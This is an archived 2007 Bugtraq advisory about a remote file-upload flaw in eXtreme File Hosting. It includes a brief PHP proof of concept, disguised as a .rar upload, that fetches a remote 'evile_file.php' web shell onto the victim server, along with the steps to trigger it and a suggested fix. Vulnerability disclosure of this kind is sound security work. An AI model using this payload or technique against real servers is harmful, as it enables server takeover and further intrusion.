eXtreme File Hosting remote file upload vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: eXtreme File Hosting remote file upload vulnerability
From: hamed.bazargani@xxxxxxxxx
Date: 9 Feb 2007 09:08:23 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

A security bug have been discovered in eXtreme File Hosting, which can be 
upload the attaker files and can get the shell with phpshell.

bug : in this borgram with php can user upload zip or rar file hacker can 
upload the a.php.rar file that contain 

###########################
<?php
$file = 'http://sample.com/evile_file.php';
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
   echo "failed to copy $file...\n";
}else{
   echo "OK file copy in victim host";
}
?> 
###########################

and upload it the click in download link then this file run and dont download
after run a.php.rar the evile_file.php copy in victim host and attacker can use 
for hacking server.


Solution:  disable rar file uploading in setting
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
software: eXtreme File Hosting
site: http://www.extremepow.com
Reported By: : hamed bazargani (hamed.bazargani@xxxxxxxxx) From I.R.IRAN and 
all iranian whitehat hacker

Prev by Date: [ MDKSA-2007:037-1 ] - Updated postgresql packages address multiple vulnerabilities
Next by Date: [Reversemode Advisory] TrendMicro Products - multiple privilege escalation vulnerabilities.
Previous by thread: [ MDKSA-2007:037-1 ] - Updated postgresql packages address multiple vulnerabilities
Next by thread: [Reversemode Advisory] TrendMicro Products - multiple privilege escalation vulnerabilities.
Index(es):
- Date
- Thread